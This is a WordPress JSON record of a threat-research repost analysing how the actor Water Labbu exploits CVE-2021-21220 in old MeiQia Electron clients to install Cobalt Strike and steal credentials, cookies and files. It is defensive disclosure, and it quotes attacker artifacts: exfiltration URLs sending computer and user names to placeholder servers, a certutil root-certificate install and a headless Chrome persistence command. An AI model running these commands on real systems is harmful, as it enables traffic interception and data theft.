{"id":48745,"date":"2022-10-05T00:00:00","date_gmt":"2022-10-05T00:00:00","guid":{"rendered":"urn:uuid:ff362037-7a95-3f4c-668d-d2037982164c"},"modified":"2022-10-05T00:00:00","modified_gmt":"2022-10-05T00:00:00","slug":"how-water-labbu-exploits-electron-based-applications","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/","title":{"rendered":"How Water Labbu Exploits Electron-Based Applications"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover-2.png\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover-2.png\" class=\"ff-og-image-inserted\"><\/div>\n<div readability=\"31.960949464012\">\n<div readability=\"11.448698315467\">\n<p>We discovered that the Cobalt Strike instance added a persistence registry key to load an exploit file from an online code repository controlled by Water Labbu. The repository hosted multiple exploit files of &nbsp;<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-21220\">CVE-2021-21220<\/a> (a Chromium vulnerability affecting versions before 89.0.4389.128) to execute a Cobalt Strike stager. It also contained files designed to target <a href=\"https:\/\/meiqia.com\/\">Meiqia<\/a> (\u7f8e\u6d3d), a Chinese desktop-based live chat app for online customer support that is used on websites. MeiQia (\u7f8e\u6d3d) was developed using <a href=\"https:\/\/www.electronjs.org\/\">ElectronJS<\/a> \u2014 a framework that employs Chromium core, and therefore is vulnerable to Chromium\u2019s vulnerabilities.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"33.5\">\n<div readability=\"12\">\n<p>We observed that many cryptocurrency scam websites that were compromised in this campaign also embedded Meiqia to provide an option for easy communication with potential victims. This association suggests that Water Labbu likely sends the exploit via the live chat box. To support this claim, we found an exploit HTML file sample containing a screenshot that looks like a withdrawal confirmation for cryptocurrency funds. If scammers open the exploit page in an old vulnerable version of the Meiqia management client application, it\u2019s possible that they might get infected by Water Labbu.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"41.809523809524\">\n<div readability=\"28.868480725624\">\n<p>The infection is initiated when) the initial scammer (in essence, the victim) opens a weaponized webpage (likely sent to them via livechat). A recent <a href=\"https:\/\/i.blackhat.com\/USA-22\/Thursday\/US-22-Purani-ElectroVolt-Pwning-Popular-Desktop-Apps.pdf\">research<\/a> paper on Electron security demonstrated a successful exploitation of an Electron-based application using CVE-2021-21220. In this scenario, it leveraged cross-site scripting (XSS) techniques to force the exploit to be rendered in a window without sandboxing.<\/p>\n<p>We found weaponized HTML pages created by Water Labbu that leverages the same Chromium vulnerability to attack the MeiQia application. The initial scammers used an old version of MeiQia, which might be vulnerable to exploits. Review of the code shows that old versions of MeiQia open external links inside their ElectronJS applications and render the web page without sandboxing. The latest version of MeiQia is not vulnerable because it runs on the newer version of Chromium core and also opens the external links, not inside the ElectronJS app, but via the default system web browser.<\/p>\n<p>The weaponized HTML pages contain JavaScript that uses the User-Agent to identify whether the environment of the victim is vulnerable.&nbsp; The script detects strings such as \u201celectron\u201d and \u201cx64\u201d to discover Electron-based applications and x64 architecture. It also detects the strings \u201c0.0.8 Chrome\/83,\u201d \u201cs\/0.0.7,\u201d or \u201cs\/0.0.6,\u201d to identify if it is running inside a vulnerable version of Chromium or MeiQia application. If the User-Agent does not match, it will either redirect victims to the official MeiQia website or create a new iframe to load screenshots from banking or cryptocurrency transactions. It\u2019s likely that these are the lures Water Labbu used to communicate with the targeted cryptocurrency scam websites.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"51.201410312913\">\n<div readability=\"49.26928162186\">\n<p>When the weaponized HTML pages detect a vulnerable target, it will proceed with loading additional stages of the attack.<\/p>\n<p>The last stage involves the creation and loading of a new script called \u201ctongji.js,\u201d which in Chinese means <a href=\"https:\/\/chinese.yabla.com\/chinese-english-pinyin-dictionary.php?define=_\">\u75db\u64ca<\/a> (to deliver a punishing attack). These files are hosted inside Water Labbu\u2019s code repository. The \u201ctongji.js\u201d script is a JavaScript containing CVE-2021-21220 exploit code, with a shellcode that is a Cobalt Strike stager. The Metasploit module for this vulnerability is <a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/browser\/chrome_cve_2021_21220_v8_insufficient_validation.rb\">publicly available<\/a>. Water Labbu reuses the available code, obfuscates it with one or more layers of obfuscation (<a href=\"https:\/\/www.sojson.com\/\">sojson.v4<\/a>, <a href=\"http:\/\/www.jsjiami.com\/\">jsjiami.com.v5<\/a>), before executing the custom shellcode.<\/p>\n<p>The embedded shellcode can either be a Cobalt Strike stager or a complex batch command capable of stealing credentials, and downloading and running other scripts and files.<\/p>\n<p>Regardless if the embedded shellcode is the stager or the custom batch script, we noticed that the set of malicious operations that were being performed were largely the same:<\/p>\n<p>1)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Download and install Cobalt Strike<br \/>2)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Steal cookies and other important files<br \/>3)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Download and patch the MeiQia app<br \/>4)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Download additional spying software<br \/>5)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Provide information about the infection progress by communicating with the report-collecting server, among others<\/p>\n<p>The Cobalt Stike stager is usually encrypted (XOR, AES), encoded (Base64, hexadecimal), and embedded into a Golang shellcode runner to make payload detection more difficult. The malware operator was likely inspired by this <a href=\"https:\/\/xz.aliyun.com\/t\/11279\">blog post<\/a>.<\/p>\n<p>It attempts to steal *.txt files in \u201c<i>\\desktop\\,<\/i>\u201d \u201c<i>\\Telegram Desktop\\<\/i>,\u201d and MeiQia cookies in \u201c<i>\\AppData\\Roaming\\com.meiqia.windows\\cookies<\/i>.\u201d These files are included in a specially crafted .html file and submitted to the information-collecting server with the help of <a href=\"https:\/\/developer.chrome.com\/blog\/headless-chrome\/\">headless<\/a> Chrome (without visible UI) or Internet Explorer (if submission with Chrome fails). The specially crafted .html file contains one form, one input text with the computer name, and one text area with stolen content. After the timeout expires, the script will automatically submit the content to a <a href=\"https:\/\/support.microsoft.com\/en-us\/topic\/what-is-typosquatting-54a18872-8459-4d47-b3e3-d84d9a362eb0\">typosquatting<\/a> domain.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"44.847543760587\">\n<div readability=\"34.881422924901\">\n<p>If Cobalt Strike has not been installed yet, then it is downloaded and executed. The Golang shellcode runner is used as a form of obfuscation.<\/p>\n<p>To learn more about the &nbsp;success or failure of the infection progress, parameters such as COMPUTERNAME and USERNAME are exfiltrated to the report-collecting server. In case of failure, the server may call the following requests:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>https:\/\/&lt;report collecting server&gt;\/?a=%COMPUTERNAME%&amp;f=0&amp;user=%USERNAME%<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>https:\/\/&lt;report collecting server&gt;\/?b=%COMPUTERNAME%&amp;f=0&amp;user=%USERNAME%<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>https:\/\/&lt;report collecting server&gt;\/?z=%COMPUTERNAME%user=%USERNAME%_fail<\/i><\/span><\/li>\n<\/ul>\n<p>If the MeiQia app is not found, the error report with parameter \u201ca\u201d is sent. If the app is found and is unpatched, the error report with parameter \u201cb\u201d is sent. If the discretionary access control list modifications with <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/icacls\">icacls<\/a> fails, the error report with parameter \u201cz\u201d is sent.<\/p>\n<p>Meanwhile, another script checks if the process \u201c360tray\u201d belonging to the 360 Total Security solution is running:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>https:\/\/&lt;report collecting server&gt;\/c\/?c=%computername%<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>https:\/\/&lt;report collecting server&gt;\/c\/?c=%computername%_no360<\/i><\/span><\/li>\n<\/ul>\n<p>In some cases, we also noticed &nbsp;DNS and HTTP monitoring platforms such as ceye.io being used to collect information about the infection progress:<\/p>\n<ul>\n<li><i><span class=\"rte-red-bullet\">ping %computername%.&lt;unique identifier&gt;.ceye.io<\/span><\/i><\/li>\n<li><i>&nbsp;<\/i><\/li>\n<li><span class=\"body-subhead-title\">The batch script for downloading and install MeiQia and Chrome<br \/><\/span><\/li>\n<\/ul>\n<p>If necessary, this batch script will download a vulnerable version of Chrome (89.0.4389.114) and\/or an-already patched MeiQia application from a repository found on a popular version control site. These files are downloaded and extracted to the infected system.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"50.392689601251\">\n<div readability=\"46.96794370602\">\n<p>The script modifies the Run registry key for persistence, with the persistent command being \u201c<i>chrome.exe &#8211;headless &#8211;no-sandbox &#8211;user-data-dir=&lt;path to user data dir&gt; &lt;path to CVE-2021-21220 exploit&gt;<\/i>\u201d. Since the script installed a vulnerable version of Chrome, the next reboot of the operating system causes the exploitation of the vulnerability and execution of the embedded shellcode (either Cobalt Strike or a custom one).<\/p>\n<p>This script adds a certificate to Trusted Root by via the <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/certutil\">certutil<\/a> utility:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>certutil<\/i> -addstore -f root &#8220;%userprofile%\\&lt;path to certificate&gt;.pem<\/span><\/li>\n<\/ul>\n<p>The script installs a certificate with the filename &#8220;<i>mitmproxy-ca-cert.pem<\/i>&#8221; into Trusted Root. Although we don\u2019t have the certificate file, It&#8217;s likely that it is generated by <a href=\"https:\/\/docs.mitmproxy.org\/stable\/concepts-certificates\/\">mitmproxy<\/a> tool due to its file name.<\/p>\n<p>It then modifies the AutoConfigURL setting in \u201c<i>HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings<\/i>\u201d. These settings allow a user to specify certain domains to have their traffic forwarded through a proxy. With the help of a malicious certificate installed in the root directory, an attacker will be able to decrypt HTTPS encrypted traffic and steal entered credentials.<\/p>\n<p>The additional scripts perform the following:<\/p>\n<p>a)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Hiding windows with the title \u201cwindows update.\u201d<br \/>b)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Downloading and running <a href=\"https:\/\/www.os-monitor.com\/\">osmonitor<\/a>, a tool for spying on victims and monitoring their behavior.<br \/>c)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Patching the MeiQia app, either by downloading an already-patched app0.2.asar <a href=\"https:\/\/github.com\/electron\/asar\">archive<\/a> and replacing it, or by running a patcher script<br \/>d)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Restarting the MeiQia app to start the patched version<br \/>e)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Stealing *.txt and *.xl* files from \u201cRecent Files,\u201d steals *.lnk, *.txt, *.xl* files from \u201cDesktop,\u201d and adds a list of processes and list of active network connections before packing these into a zip archive and uploading it to an OS information-collecting server<\/p>\n<p>The process of patching MeiQia &nbsp;involves changing files in the app.asar archive. In our scenario, the \u201c<i>.\\modules\\create-window.js<\/i>\u201d file from the app.asar archive was modified. The modifications included:<\/p>\n<p>a)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Disabling auto updates<br \/>b)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Setting fixed window sizes<br \/>c)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Replacing the default URL (<i><a href=\"https:\/\/app.meiqia.com\/\">https:\/\/app.meiqia.com<\/a><\/i>) with a malicious one<br \/>d)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Embedding additional JavaScript files to be executed within the MeiQia application context<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"39.75\">\n<div readability=\"24.84375\">\n<p>When victims open a new MeiQia window, the script injected to the internal function \u201cnew-window\u201d will check the title of the web page. If the title doesn\u2019t contain the string \u201c\u7f8e\u6d3d\u201d (MeiQia), it will redirect victims to the official MeiQia website and execute additional JavaScript files within the page.<\/p>\n<p>During our research, we discovered that many of the links used for loading additional scripts were no longer active. However, one of the links loading a script called \u201capo.js\u201d (<a href=\"https:\/\/chinese.yabla.com\/chinese-english-pinyin-dictionary.php?define=_\">\u963f\u5a46<\/a> = mother-in-law) from their code repository was still available.<\/p>\n<p>If the title contains the Chinese string \u201c\u767b\u5f55\u201d (d\u0113ng l\u00f9 = login), the script will try to grab the value of DOM elements with the IDs \u201cemail\u201d and \u201cpassword\u201d and send the grabbed data to the remote server \u201c<i>app[.]meiqiacontents[.]com<\/i>\u201d. If the title contains the Chinese word \u201c\u7f8e\u201d (Mei), it will collect the website\u2019s cookies and send them to the same remote server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"36.5\">\n<div readability=\"18\">\n<p>When victims open a new window without specifying any URL to load, the new window will load the default URL of the application (APP_URL), which has also been replaced with a malicious URL hosted on the delivery server \u201c<i>mmmm[.]whg7[.]cc<\/i>\u201d. The delivery server will only respond when the User-Agent contains the string \u201cElectron\u201d to ensure that it is sent from an Electron application.<\/p>\n<p>The request to the malicious URL responds with a code that redirects to the MeiQia app\u2019s original default URL. At the same time, it creates a small new window to load another URL that will perform several redirections before finally attempting to exploit CVE-2021-21220 to launch a Cobalt Strike stager.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"32.5\">\n<div readability=\"10\">\n<p>Water Labbu registered the typosquatting domain name meiqla.com (compared to the legitimate meiqia.com). Although the website looks visually identical to the legitimate one, there is one noteworthy malicious feature.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"32\">\n<div readability=\"9\">\n<p>Figure 14 shows how the function lc() reads the user-entered email and password and exfiltrates them to an information-recording PHP script before redirecting victims to the legitimate meiqia.com website.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div readability=\"38.301136363636\">\n<div readability=\"21.886363636364\">\n<p>Water Labbu is a dangerous new threat actor with a complex routine and infrastructure that isn\u2019t afraid to leverage the schemes of other scammers for its own ends, exploiting live chat applications on preexisting scam websites that were developed using the ElectronJS framework.<\/p>\n<p>A key part of the threat actor\u2019s routine is the exploitation of a known Chromium vulnerability to target scammers who use an unpatched version of the MeiQia app. Given that users are dealing not only with the original scammer, but with Water Labbu as well, we advise both individuals and organizations to update their applications and systems to the latest secure versions to prevent vulnerable software from being exploited and used in malicious ways.<\/p>\n<p>Read the first part of our Water Labbu series to learn more about how the threat actor compromises Dapps for their own purposes.<\/p>\n<p>The indicators of compromise for this blog entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/IOCs-water-labbu.txt\">here.<\/a><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<p>Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/j\/how-water-labbu-exploits-electron-based-applications.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the second part of our Water Labbu blog series, we explore how the threat actor exploits Electron-based applications using Cobalt Strike to deploy backdoors. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":48746,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9511,9509,9535],"class_list":["post-48745","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-research","tag-trend-micro-research-web"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>How Water Labbu Exploits Electron-Based Applications 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How Water Labbu Exploits Electron-Based Applications 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-05T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover-2.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"How Water Labbu Exploits Electron-Based Applications\",\"datePublished\":\"2022-10-05T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/\"},\"wordCount\":1947,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/how-water-labbu-exploits-electron-based-applications.png\",\"keywords\":[\"Trend Micro Research : APT&amp;Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Research\",\"Trend Micro Research : Web\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/\",\"name\":\"How Water Labbu Exploits Electron-Based Applications 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/how-water-labbu-exploits-electron-based-applications.png\",\"datePublished\":\"2022-10-05T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/how-water-labbu-exploits-electron-based-applications.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/how-water-labbu-exploits-electron-based-applications.png\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/how-water-labbu-exploits-electron-based-applications\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&amp;Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"How Water Labbu Exploits Electron-Based Applications\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How Water Labbu Exploits Electron-Based Applications 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/","og_locale":"en_US","og_type":"article","og_title":"How Water Labbu Exploits Electron-Based Applications 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-10-05T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover-2.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"How Water Labbu Exploits Electron-Based Applications","datePublished":"2022-10-05T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/"},"wordCount":1947,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/how-water-labbu-exploits-electron-based-applications.png","keywords":["Trend Micro Research : APT&amp;Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Research","Trend Micro Research : Web"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/","url":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/","name":"How Water Labbu Exploits Electron-Based Applications 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/how-water-labbu-exploits-electron-based-applications\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/how-water-labbu-exploits-electron-based-applications.png","datePublished":"2022-10-05T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity 